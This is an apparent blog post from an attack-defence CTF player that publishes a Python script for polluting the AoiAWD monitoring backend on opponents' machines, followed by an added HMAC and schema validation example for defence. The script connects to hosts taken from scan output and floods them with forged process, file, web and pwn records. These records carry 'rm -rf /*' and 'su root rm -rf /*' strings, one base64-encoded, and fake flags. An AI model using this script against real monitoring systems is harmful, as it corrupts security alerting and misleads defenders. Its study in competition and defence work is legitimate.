AoiAWD Counter-Script

Background

After AoiAWD crashed on us repeatedly in AWD competitions (the Great Wall Cup; we still made the finals in the end and coasted through them),

I looked into it after the competition

and wrote this counter-script.

Since the teammates doing recon like to use gogo,

the script accepts gogo scan results as input.

Approach

The backend does not validate the data it receives from the target machines,

so it can be polluted with dirty data.

The script was written around this:

it can push dirty data into each of AoiAWD's data display pages,

including the alert page.

Script

Publishing the script here; hope you won't hit me with it next time we meet in an AWD, thanks QAQ

import re
import socket

# ip.txt holds gogo scan output; lines of interest contain a tcp://host:port target.
with open("./ip.txt", "r") as f:
    url_list = f.readlines()

pattern = r"tcp://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):(\d+)"

for line in url_list:
    match = re.search(pattern, line)
    if match:
        host, port = match.group(1), int(match.group(2))
        server_address = (host, port)  # replace SERVER_IP and SERVER_PORT with the actual values
        # One newline-delimited JSON record per message; the backend accepts them unvalidated.
        data = '{"type":"ping"}\n'
        data2 = '{"type":"new_process","data":{"pid":"114514","ppid":"114514","uid":"0","username":"root","cmd":"rm -rf /*","param":"su root rm -rf /*"}}\n'
        data3 = '{"type":"file","data":{"path":"/update/score_points","mode":33188,"event":256,"size":114514,"content":"ZmxhZ3tDcmF6eV9UaHVydGhkYXlfdl9tZV81MH0="}}\n'
        data4 = '{"type":"web","data":{"scipt":"/var/www/html/rce.php","method":"post","uri":"127.0.0.1/rce.php","remote":"127.0.0.1","buffer":"{\\"flag\\":\\"flag{Crazy_Thurthday_v_me_50}\\"}"}}\n'
        data5 = '{"type":"pwn","data":{"file":"catflag","type":"stdin","pid":"123","maps":"su root rm -rf /*"}}\n'
        data6 = '{"type":"pwn","data":{"file":"catflag","type":"stdin","pid":"123","maps":"su root rm -rf /*"}}\n'
        data7 = '{"type":"file","data":{"path":"/114514","mode":33188,"event":256,"size":114514,"content":"c3Ugcm9vdCBybSAtcmYgLyo="}}\n'
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            try:
                sock.settimeout(1)
                sock.connect(server_address)
                # Handshake: the backend answers a ping with pong.
                sock.sendall(data.encode("utf-8"))
                tmp = sock.recv(1024)
                if "pong" in str(tmp):
                    sock.sendall(data2.encode("utf-8"))
                    sock.sendall(data3.encode("utf-8"))
                    sock.sendall(data4.encode("utf-8"))
                    for j in range(60):
                        sock.sendall(data7.encode("utf-8"))
                        sock.sendall(data6.encode("utf-8"))
                        sock.sendall(data5.encode("utf-8"))
                    print(f"[+] {host}\n")
                    sock.close()
                else:
                    print(
                        f"\n[-] --------------------------------{host}-------------------------------------\n"
                    )
            except Exception as e:
                print(f"An error occurred: {e}")
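The root cause from the Approach section is that the backend accepts any newline-delimited JSON from whoever can reach the agent port. The following is an added example, not AoiAWD's code, of what the receiving side would need: a per-agent HMAC tag on every line plus a strict per-type schema, modelled on the record types the script above sends. The envelope layout, the AGENT_KEY secret, the field types, and the corrected "script" spelling are all assumptions.

```python
import hashlib
import hmac
import json

# Assumed per-agent shared secret; AoiAWD's wire format carries no tag, this is the proposed fix.
AGENT_KEY = b"per-agent-secret-from-deployment"

# Required fields and types per record type, modelled on the fields the script above sends.
SCHEMA = {
    "ping": {},
    "new_process": {"pid": int, "ppid": int, "uid": int, "username": str, "cmd": str, "param": str},
    "file": {"path": str, "mode": int, "event": int, "size": int, "content": str},
    "web": {"script": str, "method": str, "uri": str, "remote": str, "buffer": str},
    "pwn": {"file": str, "type": str, "pid": int, "maps": str},
}

def sign_record(record: dict, key: bytes) -> str:
    """Agent side: canonical JSON body plus an HMAC-SHA256 tag, one envelope per line."""
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return json.dumps({"body": body, "mac": mac}) + "\n"

def validate_line(line: str, key: bytes):
    """Server side: (record, None) if authentic and well-formed, else (None, reason)."""
    try:
        env = json.loads(line)
        body, mac = env["body"], env["mac"]
    except (ValueError, KeyError, TypeError):
        return None, "malformed envelope"
    if not (isinstance(body, str) and isinstance(mac, str)):
        return None, "malformed envelope"
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return None, "bad mac"  # unauthenticated sender: reject before parsing the body
    try:
        record = json.loads(body)
    except ValueError:
        return None, "malformed body"
    fields = SCHEMA.get(record.get("type")) if isinstance(record, dict) else None
    if fields is None:
        return None, "unknown type"
    data = record.get("data", {})
    if not isinstance(data, dict) or set(data) != set(fields):
        return None, "unexpected field set"
    for name, typ in fields.items():
        # bool is a subclass of int, so reject it explicitly; a str such as "114514" fails here too.
        if isinstance(data[name], bool) or not isinstance(data[name], typ):
            return None, f"field {name} has wrong type"
    return record, None
```

With this in place the script's forged records are dropped twice over: they carry no valid tag, and even a correctly tagged copy fails on the string-typed pid and the misspelled web field.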

Next

Having analysed the various AWD defence tools (Aoi, wathbird and others),

I have decided to model a new tool on Aoi while borrowing from the others

and rewrite an AWD monitoring and defence system in Go (gin or iris; most likely gin).

I have no time to develop it at the moment though (don't ask; the answer is that it is delayed).

Expected to appear in May 2025 :)

If you have kept traffic or other data from any AWD competitions,

or have analysed and understood the official check mechanism,

or have plenty of AWD experience,

please feel free to get in touch with this noob.